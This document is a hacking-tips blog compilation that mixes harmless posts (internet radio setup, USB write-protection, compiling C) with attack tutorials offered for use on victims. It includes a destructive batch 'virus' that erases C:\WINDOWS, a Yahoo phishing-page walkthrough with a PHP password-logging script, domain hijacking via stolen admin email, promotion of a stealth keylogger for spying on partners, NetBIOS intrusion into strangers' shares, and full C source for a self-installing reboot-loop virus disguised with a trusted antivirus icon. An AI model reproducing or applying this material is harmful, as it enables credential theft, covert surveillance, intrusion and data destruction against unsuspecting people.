Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips


How To Make Your Own Radio station

Love to listen to internet radio ? Have a great collection of music ? Wanna be a DJ ? or just wanna make others experience your great collection of music ? lets get it going..and get ready to rap,roll and obviously broadcast…
Here is what you need -How To Make Your Own Radio station - PROHACK
Firstly,your internet speed has to be at least 64 kbps or above (which means Dial-up users, who will be having a lot of latency, will not be able to setup) . Secondly,you going to have to have a domain, an updated one with the current IP active. 
Download the Shoutcast files and install them in any order.
Now navigate to
START > PROGRAM FILES > SHOUTcast DNAS > EDIT SHOUTCAST DNS CONFIG.
Configuring Shoutcast -
  • Go Down and where it says Password : change (set it something you can remember..duh.)
  • The Portbase : change it to whatever port you want it
  • Maxusers : (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles your fantasy.
EDIT > SAVE
  • Now Open winamp and right click it or press ctrl + P
RIGHT CLICK > OPTIONS > PREFRENCES > DSP EFFECT > and choose the NULLSOFT SHOUTCAST.
  • Now Go to OUTPUT, and then click on Connection.
  • Through the ADDRESS, type your address which you have done through www.no-ip.com, PORT NUMBER, whatever u did in the EDIT.txt, and your password.
  • Then go to Encoder, and choose your quality of your music.
  • Now Go back to
OUTPUT > OUTPUT CONFIG > YELLOW PAGES
This is your advertisement information. Write whatever you like there.
Now Connect. To check that your Radio on-line go to http://(your address that you added in the preference).
Cheers,you have successfully created your own radio station,tell others about it to tune into it and enjoy…

Cheers and Keep learning.

Disable Writing to USB Drives

A common security concern at organizations is allowing users to plug in a usb flash drive, because they could so easily copy corporate data.Since Windows XP SP2, you can disable writing to USB devices altogether using a simple registry hack.however one should also note that if you are using this trick, you should make sure that the users are not administrators on the computer, because they could easily change this setting back.
Here it is:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000001

Paste the code into a notepad file,and then save it as a registry file.Double click it and voila,you have successfully prevented the write access to the USB drive.
Once you have double clicked the registry, you will have to reboot for the changes to take effect.
This works on Windows Vista as well. Here's the window you'll get when you try and write to a USB drive:
Disable Writing to USB Drives
If you want to enable the write access again,then copy this code and paste the code into a notepad file,and then save it as a registry file.Double click it and write access will be enabled again.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000000'


Stay tuned for more tips and hacks.
Keep learning

Make virus in just one minute

Plx Reply and show your feed back
Here is a simple and easy trick to make a virus in less than 1 minute. :)


CAUTION: DO NOT RUN THE PROGRAM ON YOUR COMPUTER OR YOU WILL LOSE YOUR WINDOWS.

HERE'S THE To Make the virus:

1.Go to notepad,
2. Type erase C:\WINDOWS,
3. Save IT AS SOMETHING.cmd ,
4. Send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...

How does this works?
The working of this virus is very simple,Once the victim runs the .cmd file on his computer,This virus will just erase the windows file causing the computer to crash.

Hack yahoo using fake login page





Fake login page

In this post I’ll show you to hack yahoo using fake login page to hack yahoo in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.



Here is a step-by-step procedure to create a fake login page and hack yahoo.

Hack yahoo using fake login page - Procedure



STEP 1.
Go to the Yahoo login page by typing the following URL.

mail.yahoo.com


STEP 2.

Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.

STEP 3.
Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

STEP 4.
Make sure that the folder contains the necessary images and other support files.Now rename the Folder to “files“.You may also rename the .HTML file to yahoo.HTML

STEP 5.
Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif

Rename the above link into

src=”files/ma_mail_1.gif

Repeat the same procedure for every file contained in the folder by name “files“.

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.

STEP 6.
Now search for the following term

action=

you will see something like this

action=https://login.yahoo.com/config/login?

Edit this to

action=http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com with yahooupdate.110mb.com.

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

STEP 7.
Now you have to upload your yahoo.HTML, files folder and login.php to

yoursite.com Root folder

NOTE: Make sure that your host supports PHP


Tip: 110mb.com supports PHP

STEP 8.
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.

STEP 9.

Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
here is the login script which i am posting due to large number of requst


header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

Domain Hijacking – How to Hijack a Domain


Domain hijackingIn this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.
Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).
 

The operation of domain name is as follows

 
Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain. 
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.
 

What happens when a domain is hijacked

 
Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of  “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name (abc.com) is said to be hijacked.
 

How the domain names are hijacked

 
To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain. 
These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.
 

How to protect the domain name from being hijacked

 
The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

How to Hack an Email Account – Email Hacking

How to Hack an Email AccountWondering to know how to hack an email account? Well, before you can do that, you need to understand the real ways of hacking that actually work and also that are simply scam and do not work.
So, here in this post, I am going to discuss some of the Real and Working Ways to hack emails; along with that, I am also going to make you aware of the common myths and scams associated with email hacking.
On a regular basis, a lot of people contact me about suspecting their boyfriend or girlfriend of cheating, and ask me how to hack their email password so as to find out the truth. If you are in a similar situation where you want to hack into someone’s email account, then this post might help you!
With my experience of over 8 years in the field of ethical hacking and computer security, I can tell you that, there exists only 2 foolproof methods to hack emails. All the other methods are simply scam or don’t work.
 

 Possible Ways to Hack an Email Account

 
 

1. Keylogging: The Easiest Way!

 
Keylogging simply refers to the process of recording each and every keystroke that a user types on a specific computer’s keyboard. This can be done using a small software program called keylogger (also known as spy software). Once you install this program on the target computer, it will automatically load from the start-up and start capturing every keystroke typed on that computer including usernames and passwords. A keylogger software will operate in a complete stealth mode and thus remains undetected.
In order to use this software, you don’t need to have any special knowledge of hacking. Anyone with a basic knowledge of computer should be able to install and use this software with ease. I recommend the following keylogger as the best for your monitoring needs.
 
Easily Access any Email
 
 
SniperSpy Benefits
 
 
Here is a summary of benefits that you will receive with SniperSpy software:
 
1. You can ACCESS ANY PASSWORD
With SniperSpy, you can gain access to any password protected material such as Facebook, MySpace or any other email account.
 
2. REMOTE INSTALL Feature
SniperSpy has a Remote Install feature using which it makes it possible to install this software on a remote computer. This feature can be very handy when you do not have physical access to the target computer on which you want to install this software.
 
3. MONITOR EVERY ACTIVITY on the Target Computer
With SniperSpy, you can not only capture the passwords, but also spy on their IM conversations and take screenshots of the activities on the target computer.
 
4. NEVER GET CAUGHT
Since SniperSpy runs in a complete stealth mode, it’s presence on the target computer remains undetected. So you need not worry about being caught or traced back.
 
5. Extremely EASY TO USE
Since SniperSpy is designed for novice computer users, it requires no special skills to install and use.
 
6. Works on Both PC and MAC
SniperSpy is fully compatible with Windows 2000/XP/Vista/7 and Mac.
 
Can I Install SniperSpy on a Local Computer?
Yes, you can install SniperSpy on a Local or Remote computer. It supports both Remote and Local installations. So, you need not worry whether it is a local or a remote computer.
 
How Safe is to Use SniperSpy?
SniperSpy is completely safe and secure since it neither collects any information from your computer nor contact you in any way.
So, what are you waiting for? Go, grab it now and expose the truth!
 
 
 
 
 

2. Phishing: The Difficult Way

 
Phishing is the other most commonly used trick to hack email passwords. This method involves the use of Fake Login Pages whose look and feel are almost identical to that of legitimate websites. Fake login pages are created by many hackers which appear exactly as Gmail or Yahoo login pages. 
Once you enter your login details on such a fake login page, they are actually stolen away by the hacker. However, creating a fake login page and taking it online to successfully hack an email account is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. Also, phishing is considered  as a serious criminal offense and hence it is a risky job to attempt phishing attack. So, I recommend the usage of keyloggers as the best to hack email password.
 

Common Myths and Scams Associated with Email Hacking

 
Today, there are many scam websites out there on the Internet which often misguide users with false information. Some of them may even rip off your pockets with false promises. So, here are some of the things that you need to be aware of:
1. There is no readymade software program (except the keylogger) that can hack emails and get you the password instantly just with a click of a button. So, if you come across any website that claims to sell such softwares, I would advise you to stay away from them.
2. Never trust any hacking service that claims to hack any email for just $100 or $200. All I can tell you is that, most of them are no more than a scam.
3. I have seen many websites on the Internet that are distributing fake tutorials on email hacking. Most of these tutorials will tell you something like this: “you need to send an email to passwordrecovery@gmail.com along with your username and password” (or something similar). Beware! Never give away your password to anyone nor send it to any email address. If you do so, you will lose your password itself in attempt to hack somebody else’s password.

How to Protect an Email Account from being Hacked



Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is: “Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.
 
If this is the case, then what is the reason for many people to lose their accounts?
The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who lose their email accounts are not the victims of hacking but the victims of Trapping. They lose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.
Are you confused? If so continue reading and you’ll come to know…
Now I’ll mention some of the most commonly used online scams which fool people and make them lose their passwords. I’ll also mention how to protect your email account from these scams.
 
1. WEBSITE SPOOFING
Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original) especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.
For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and lose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.
 
Solution:
  • Never try to login/access your email account from the sites other than the original site.
  • Always type the URL of the site in the address bar to get into the site. Never click on the hyperlink to enter the site.
 
2. BY USING KEYLOGGERS
The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely lose your password. This is because the keylogger records each and every keystroke that you type.
 
Solution:
Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.
 
3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES
Do you access your email from cyber cafes?  Then definitely you are under the risk of loosing your password.In fact many people lose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.
This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.
So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked. Please pass your comments…

Hacking Yahoo Messenger


This tutorial will tell you how to hack yahoo messenger while you are engaged in chatting with some person. While you are chatting through yahoo messenger, Yahoo will hide the IP addresses of all the computers that are connected through the yahoo messenger application to the chat room. So it is not possible to directly find out the IP of the person you want to hack. Then how to get the IP address? Yes it is still possible to hack the IP address during the Yahoo messenger chat. The procedure to Hack Yahoo messenger is discussed in detail below.
While you are chatting via yahoo messenger the communication between you and the person you want to hack, takes place indirectly via Yahoo server and not directly. It is not possible to hack Yahoo messenger directly to get the IP address. So to hack his IP, you must establish a direct communication with him. So ,how to do this? It’s easy. Just start chatting with some one via Yahoo messenger. During the process of chatting send him a big file. Now the file transfer takes place directly between your computer and the victim’s computer(via yahoo messenger application). So now, you are ready to go. Here’s the step-by-step process to hack Yahoo messenger and get the IP address of the person .
  • Goto the COMMAND PROMPT (START>>>RUN>>>Type CMD).
  • Here Type “netstat -n” (without quotes).
NOTE: If you are new to “netstat” and other IP related commands refer this tutorial: Windows XP IP Utilities
  • The pic given below shows netstat results of my computer. I was not chatting when i took this pic and hence it looks modified.
  • Here local address is your own IP and the foreign address is the IP address of the recipient with whom you are connected via yahoo messenger (There may be multiple recipients and hence multiple foreign addresses).
  • Now send him the file.
  • Check the output by typing the command “netstat -n” (without quotes).
  • Assume the output is something like this.
TCP 127.0.0.10:5101 124.55.23.11:1246 ESTABLISHED
 
Here 124.55.23.11 is the IP address of the person with whom you are chatting and 1246 is the port number where connection is established. That’s It! You have now hacked Yahoo messenger to get his IP address.
Once you hack Yahoo messenger and get his IP address you can use any of the Remote Administration tools or perform NETBIOS HACKING.
NOTE: Some times there are chances where in the file transfer gets encrypted (takes place via yahoo server itself). So in this case the above hack may fail to work.

Windows IP Utilities



The following are the IP utilities available in Windows that help in finding out the information about IP Hosts and domains. These are the basic IP Hacking Commands that everyone must know!
Please note that the the term Host used in this article can also be assumed as a Website for simple understanding purpose.
1. PING
PING is a simple application (command) used to determine whether a host is online and available. PING command sends one or more ICMP Echo messages to a specified host requesting a reply. The receiver (Target Host) responds to this ICMP Echo message and returns it back to the sender. This confirms that the Host is online and available. Otherwise the host is said to be unavailable.
Syntax:
C:\>ping gohacking.com
 
2. TELNET
Telnet command is used to connect to a desired host on a specified port number. For example
Syntax:
C:\>telnet yahoo.com 25
C:\>telnet yahoo.com
 
NOTE: The default port number is 23. When the port number is not specified the default number is assumed.
Telnet Hacking is explained in detail in the following post.
How To Send Fake Email
 
3. NSLOOKUP
Many times we think about finding out the IP address of a given site. Say for example google.com, yahoo.com, microsoft.com etc. But how to do this? For this there are some websites that can be used to find out the IP address of a given site. But in Windows we have an inbuilt tool to do this job for us. It is nslookup. Yes this tool can be used for resolving a given domain name into it’s IP address (determine the IP of a given site name). Not only this it can also be used for reverse IP lookup. That is if the IP address is given it determines the corresponding domain name for that IP address.
Syntax:
C:\>nslookup google.com
 
4. NETSTAT
The netstat command can be used to display the current TCP/IP network connections. For example the following netstat command displays all connections and their corresponding listening port numbers.
Eg: C:\>netstat -a
 
This command can be used to determine the IP address/Host names of all the applications connected to your computer. If a hacker is connected to your system even the hacker’s IP is displayed. So the netstat command can be used to get an idea of all the active connections to a given system.

Netbios Hacking

THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER. NETBIOS HACK IS THE EASIEST WAY TO BREAK INTO A REMOTE COMPUTER.
STEP-BY-STEP NETBIOS HACKING PROCEDURE
1.Open command prompt
2. In the command prompt use the “net view” command
( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS. BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).
Example: C:\>net view \\219.64.55.112
The above is an example for operation using command prompt. “net view” is one of the netbios command to view the shared resources of the remote computer. Here “219.64.55.112″ is an IP address of remote computer that is to be hacked through Netbios. You have to substitute a vlaid IP address in it’s place. If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown. If not an error message is displayed. So repeat the procedure 2 with a different IP address.
3. After succeeding, use the “net use” command in the command prompt. The “net use” is another netbios command which makes it possible to hack remote drives or printers.
Example-1:
C:\>net use D: \\219.64.55.112\F
Example-2:
C:\>net use G: \\219.64.55.112\SharedDocs
Example-3:
C:\>net use I: \\219.64.55.112\Myprint
 
NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.
NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES, FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER. THAT IS, IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT
F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer. These are displayed after giving “net use” command. “219.64.55.112″ is the IP address of remote computer that you want to hack.
4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.
Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name. You can open it and access remote computer’s Hard-Drive. You can copy files, music, folders etc. from victim’s hard-drive. You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system. You can access files/folders quickly through “Command Prompt”.
NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios. That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed). So Repeat The Procedure 2,3 With Different IP Address.
HAPPY NETBOS HACKING!!

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.
#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.
 
Compiling The Scource Code Into Executable Virus.
 
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, refer my post How to compile C Programs.
 
Testing And Removing The Virus From Your PC
 
You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
 
1. Reboot your computer in the SAFE MODE
2. Goto
X:\Windows\System
(X can be C,D,E or F) 3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

 There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
 
Logic Behind The Working Of The Virus
 
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.
 
LOGIC:
 
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
 
AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)
 
After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

A Virus Program to Disable USB Ports


Virus to disable USB portsIn this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).
I hope you like this post. Please pass your comments.

How to Compile C Programs

In many of my previous posts especially in the VIRUS CREATION section, I have used C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.
 

How to install Borland C++ compiler

 
1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.
http://www.codegear.com/downloads/free/cppbuilder
2. After you download, run freecommandlinetools.exe. The default installation path would be
C:\Borland\BCC55
 

How to configure Borland C++ compiler

 
1. After you install Borland C++ compier, create two new Text Documents
2. Open the first New Text Document.txt file and add the following two lines into it
-I”c:\Borland\Bcc55\include” -L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.
3. Open the second New Text Document (2).txt file and add the following line into it
-L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document (2).txt to ilink32.cfg.
4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.
 

How to compile the C source code (.C files)

 
1. You need to place the .C (example.c) file to be compiled in the following location
C:\Borland\BCC55\Bin
2. Now goto command prompt (Start->Run->type cmd->Enter)
3. Make the following path as the present working directory (use CD command)
C:\Borland\BCC55\Bin
4. To compile the file (example.c) use the following command
Command to Compile C Program
bcc32 example.c
5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).
6. Now you have successfully compiled the source code into an executable file(.exe file). 
NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).

How to Change the ICON of an EXE file


Some times it becomes necessary to change the ICON of an executable (.exe) file so that the exe file get’s a new appearence. Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user. But in reality when the file is carried to a different computer, then it shows it’s original ICON itself. This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself. Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.
For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie: The tool changes the exe ICON permanantly.
I’ll give you a step-by-step instruction on how to use this tool to change the icon.
1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).
2. Right-click on the exe file whose ICON is to be changed.
3. Now you will see the option Change Icon. Click on that option.
